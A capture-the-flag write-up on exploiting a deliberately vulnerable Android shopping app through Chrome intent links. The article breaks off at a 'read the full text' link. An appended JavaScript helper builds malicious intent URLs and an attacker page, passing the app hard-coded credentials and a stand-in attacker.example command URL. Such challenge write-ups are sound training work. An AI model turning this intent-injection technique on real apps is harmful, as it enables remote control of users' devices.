[Security Attack and Defense Challenge] Android app remote control in practice

Problem-solving ideas for the third question (Android PwnMe) of the Ali Ju Security Attack and Defense Challenge

Everyone ran into the Android app remote-control problem in the third question of the official round of the Ju Security Challenge. Today we walk through how to solve it.

1. Title
Shopping application pwn (6 points)
Environment:
- The attack must succeed on an ARM 64-bit Android phone, and also in the emulator (running the Google APIs ARM64 Android 7.0 image from Google's official Android SDK). The image is packaged and provided with the challenge; see the download link in the task. Reference emulator command: (qemu-system-aarch64 -sysdir . -datadir . -kernel kernel-qemu -system system.img -ramdisk ramdisk.img -data userdata.img)
- an apk containing the bug
- must work in a non-root environment

Attack process:
- Load the apk into the emulator.
- Open the Chrome browser and visit the address of the player's malicious web page. (The web service is built by the player.)
- A shell in the context of this app is obtained through the player's malicious web page.
- The apk displays "purchase successful".

Target: clicking the link in the Chrome browser remotely triggers the app's purchase logic, and "purchase successful" is shown on the app interface.

Scoring criteria: 6 points for remote arbitrary code execution in the app, triggered by visiting the web page in the browser, of which:
1. Bouncing back a shell that controls the app: 5 points.
2. Further making the app interface display "purchase successful": 1 more point.
3. The source code of the exploit for the remote arbitrary code execution must be provided.
2. Problem-solving ideas
The attack process is as follows:

1. Android Intents with Chrome
The task requires "clicking a link in the Chrome browser". Chrome's official documentation specifies how a link can launch an app through an intent: https://developer.chrome.com/multidevice/android/intents. Disassembling ExamPwn.apk shows that AndroidManifest.xml does accept the relevant intents, as shown in the figure:

The class LoginActivity first receives the intent, parses the account and password out of it and matches them against credentials that are hard-coded in plain text in LoginActivity itself, so they can be read straight from the disassembly. Because the check relies only on these client-side constants, any web page that embeds them passes it. After a correct match, the url carried in the intent is handed to the class MainActivity. That is to say, the attacker's web page looks at least as follows:
Read the full text: http://click.aliyun.com/m/9829/
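The following is an added example for this writeup, not code from the original article or from the ExamPwn app. It builds a link in the "intent://" syntax that Chrome for Android accepts (https://developer.chrome.com/multidevice/android/intents) and parses it back the way Android's Intent.parseUri() does, so that both what the attacker's page sends and what LoginActivity receives are visible. The scheme, host, package name, extra names (account, password, url) and credential values are placeholders (assumptions); the real ones come from the apk's manifest and the LoginActivity disassembly.

```javascript
// Added example (not the original writeup's code). Builds and parses
// "intent://" links in the format Chrome for Android hands to Intent.parseUri().
// Scheme, host, package, extra names and credentials below are placeholders.

const INTENT_PREFIX = "intent:";
const INTENT_MARK = "#Intent;";
const INTENT_END = "end";

// Build intent://host/path#Intent;field=value;...;end. Extras are typed by
// prefix (S. = String, i. = int, B. = boolean). Values are percent-encoded
// because ';' and '=' are separators inside the fragment; Intent.parseUri()
// decodes them again on the device.
function buildIntentUrl({ host, path = "/", scheme, pkg, action, extras = {}, fallbackUrl }) {
  const fields = [];
  if (scheme) fields.push("scheme=" + scheme);
  if (action) fields.push("action=" + action);
  if (pkg) fields.push("package=" + pkg);
  for (const [name, value] of Object.entries(extras)) {
    const type = Number.isInteger(value) ? "i" : typeof value === "boolean" ? "B" : "S";
    fields.push(type + "." + name + "=" + encodeURIComponent(String(value)));
  }
  // Optional: Chrome opens this URL instead when no app handles the intent.
  if (fallbackUrl) fields.push("S.browser_fallback_url=" + encodeURIComponent(fallbackUrl));
  return INTENT_PREFIX + "//" + host + path + INTENT_MARK +
         fields.map((f) => f + ";").join("") + INTENT_END;
}

// Device-side view, mirroring Intent.parseUri(): returns the data URI, package,
// action and extras that the receiving activity sees through getIntent().
function parseIntentUrl(url) {
  const markAt = url.indexOf(INTENT_MARK);
  if (!url.startsWith(INTENT_PREFIX) || markAt < 0 || !url.endsWith(";" + INTENT_END)) {
    throw new Error("not a well-formed intent URL: " + url);
  }
  const dataPart = url.slice(INTENT_PREFIX.length, markAt); // "//host/path"
  const body = url.slice(markAt + INTENT_MARK.length, url.length - INTENT_END.length);
  const out = { data: null, scheme: null, pkg: null, action: null, extras: {} };
  for (const field of body.split(";")) {
    if (field === "") continue;
    const eq = field.indexOf("=");
    const key = eq < 0 ? field : field.slice(0, eq);
    const value = eq < 0 ? "" : decodeURIComponent(field.slice(eq + 1));
    if (key === "scheme") out.scheme = value;
    else if (key === "package") out.pkg = value;
    else if (key === "action") out.action = value;
    else if (key.length > 2 && key[1] === ".") {
      const name = decodeURIComponent(key.slice(2));
      if (key[0] === "i") out.extras[name] = parseInt(value, 10);
      else if (key[0] === "B") out.extras[name] = value === "true";
      else out.extras[name] = value; // S. (and other types) kept as a string here
    }
    // category=, component=, launchFlags= and friends are ignored in this demo.
  }
  // Android reconstructs data as "scheme:" + "//host/path" when a scheme is given.
  out.data = (out.scheme ? out.scheme + ":" : "") + dataPart;
  return out;
}

// The attacker's page itself: a plain link. Chrome does not launch an app for
// an intent:// navigation started without a user gesture, which is why the
// task is phrased as "click the link".
function attackerPage(intentUrl) {
  const href = intentUrl.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
  return '<!doctype html>\n<meta charset="utf-8">\n<title>shop</title>\n' +
         '<a href="' + href + '">Open the shopping app</a>\n';
}

// Constructed demo values (assumptions, not the real ExamPwn data). The
// password contains ';' and '=' on purpose to show why encoding is required.
const DEMO_INTENT = buildIntentUrl({
  scheme: "exampwn",
  host: "login",
  pkg: "com.example.exampwn",
  extras: { account: "admin", password: "p@ss;word=1", url: "http://attacker.example/cmd" },
});

console.log(DEMO_INTENT);
console.log(attackerPage(DEMO_INTENT));
```

Serving the page produced by attackerPage() and tapping the link in Chrome delivers an intent whose string extras are exactly the ones the page encoded; whether LoginActivity accepts it depends only on the hard-coded credentials the disassembly reveals.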

Origin http://43.154.161.224:23101/article/api/json?id=326359086&siteId=291194637